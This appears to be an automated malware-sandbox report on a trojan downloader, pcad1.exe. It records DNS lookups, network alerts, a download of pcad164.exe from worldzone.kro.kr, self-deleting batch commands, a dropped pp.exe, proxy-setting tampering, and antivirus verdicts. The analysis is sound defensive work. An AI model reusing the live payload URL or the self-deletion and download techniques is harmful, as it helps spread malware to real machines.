popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

pcad1.exe

Antivirus OS Processor Check PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 June 25, 2021, 9:30 a.m. June 25, 2021, 9:36 a.m.
Size 540.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c7af1f6747d5c61e97d556dec9aec85c
SHA256 8b3a8268efe41220e294e6cad1055c46041d11c59ba37672709401aaefe5ae47
CRC32 9C73451D
ssdeep 12288:S2vcfzbyNUJO5FNg6QQCnoZeHn12N2+/tr4Kn2Ghn4:SxXyNU4gACosHed/tdn2GR
Yara
  • PE_Header_Zero - PE File Signature
  • Antivirus - Contains references to security software
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
worldzone.kro.kr
A 15.164.192.168
15.164.192.168
google.com
A 142.250.204.110
172.217.31.174
IP Address Status Action
142.250.204.110 Active Moloch
15.164.192.168 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49202 -> 15.164.192.168:80 2022550 ET MALWARE Possible Malicious Macro DL EXE Feb 2016 A Network Trojan was detected
TCP 192.168.56.101:49202 -> 15.164.192.168:80 2022566 ET MALWARE Possible Malicious Macro EXE DL AlphaNumL A Network Trojan was detected
TCP 15.164.192.168:80 -> 192.168.56.101:49202 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: del
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /f /s /q "C:\Users\test22\AppData\Local\Temp\pcad1.exe"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\pcad1.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: if
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: exist "C:\Users\test22\AppData\Local\Temp\pcad1.exe"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: goto
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Repeat
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: del
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /s /q "mkill.bat"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\mkill.bat
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0
request GET http://worldzone.kro.kr/pcad164.exe
name RT_VERSION language LANG_KOREAN filetype data sublanguage SUBLANG_KOREAN offset 0x000850a0 size 0x00000330
file C:\Windows\pp.exe
file C:\Users\test22\AppData\Local\Temp\mkill.bat
file C:\Users\test22\AppData\Local\Temp\pcad1.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory: C:\Windows
filepath:
track: 0
command_line: C:\Windows\pp.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000
0 0

ShellExecuteExW

 show_type: 0
filepath_r: mkill.bat
parameters:
filepath: mkill.bat
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000284
process_name: sdclt.exe
process_identifier: 1032
1 1 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Sun, 13 Jun 2021 12:49:42 GMT Accept-Ranges: bytes ETag: "45c971945260d71:0" Server: Microsoft-IIS/8.5 Date: Fri, 25 Jun 2021 00:34:04 GMT Content-Length: 13973504 MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ö6”ú’Wú©’Wú©’Wú©/l©—Wú©›/y©Wú©›/o©˜Wú©µ‘—©•Wú©µ‘©‰Wú©’Wû©ØUú©›/p©”Wú©›/~©Wú©Œn©“Wú©›/k©“Wú©Rich’Wú©PEd†äþÅ`ð"  ššÑF@ÐÕ6”Õ@(˜ð xtÏP|D Õ°0 .text„˜š `.rdata¢° ž@@.dataðÀ*¨@À.pdata|DPFÒ@@.rsrcxtÏ vÏ@@.relocz¨ ÕªŽÔ@B
received: 1024
socket: 760
1 1024 0
file C:\Users\test22\AppData\Local\Temp\mkill.bat
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x0000025c
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Barys.114250
FireEye Gen:Variant.Barys.114250
CAT-QuickHeal Trojandownloader.Generic
ALYac Gen:Variant.Barys.114250
Cylance Unsafe
Sangfor Riskware.Win32.Agent.ky
Alibaba TrojanDownloader:Win32/Generic.8ddbd1ad
Cybereason malicious.747d5c
Cyren W32/Trojan.KYFW-8002
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:Dh-A [Heur]
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Barys.114250
Ad-Aware Gen:Variant.Doina.17475
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0PFI21
McAfee-GW-Edition BehavesLike.Win32.Generic.hh
Emsisoft Gen:Variant.Barys.114250 (B)
Webroot W32.Malware.Gen
MAX malware (ai score=100)
Antiy-AVL Trojan/Generic.ASMalwS.3391D01
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/Glupteba!ml
ZoneAlarm HEUR:Trojan-Downloader.Win32.Generic
GData Gen:Variant.Barys.114250
McAfee RDN/Generic Downloader.x
VBA32 BScope.Trojan.Downloader
Malwarebytes Malware.AI.4278874678
TrendMicro-HouseCall TROJ_GEN.R002C0PFI21
Tencent Win32.Trojan-downloader.Generic.Szvj
MaxSecure Trojan.Malware.1728101.susgen
Fortinet W32/PossibleThreat
BitDefenderTheta Gen:NN.ZexaE.34758.Hu0@ay0psgcO
AVG Win32:Dh-A [Heur]
Panda Trj/GdSda.A